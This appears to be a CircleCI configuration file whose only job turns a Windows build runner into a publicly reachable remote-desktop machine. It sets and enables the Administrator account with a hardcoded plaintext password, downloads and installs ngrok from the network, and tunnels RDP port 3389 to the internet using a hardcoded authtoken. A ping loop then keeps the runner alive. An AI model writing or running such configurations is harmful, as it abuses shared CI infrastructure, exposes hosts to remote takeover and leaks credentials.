version: 2.1

orbs:
  win: circleci/windows@2.2.0

jobs:
  build:
    executor:
      name: win/default
      shell: powershell.exe
    steps:
      - checkout
      - run: systeminfo
      - run:
          name: "start"
          shell: powershell.exe
          command: |
            Set-LocalUser -Name "Administrator" -Password (ConvertTo-SecureString -AsPlainText "Akuhnet123" -Force)
            Get-LocalUser -Name "Administrator" | Enable-LocalUser 
            Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
            tar xf ngrok.zip
            Copy ngrok.exe C:\Windows\System32
            cmd /c echo ./ngrok.exe authtoken "1z4CgHPPA98ethWDsHeoSHsroQD_5vHxvXrksukihRGyvNfmE" >a.ps1
            cmd /c echo cmd /k start ngrok.exe tcp --region ap 3389 >>a.ps1
            cmd /c echo ping -n 999999 google.com >>a.ps1
            .\a.ps1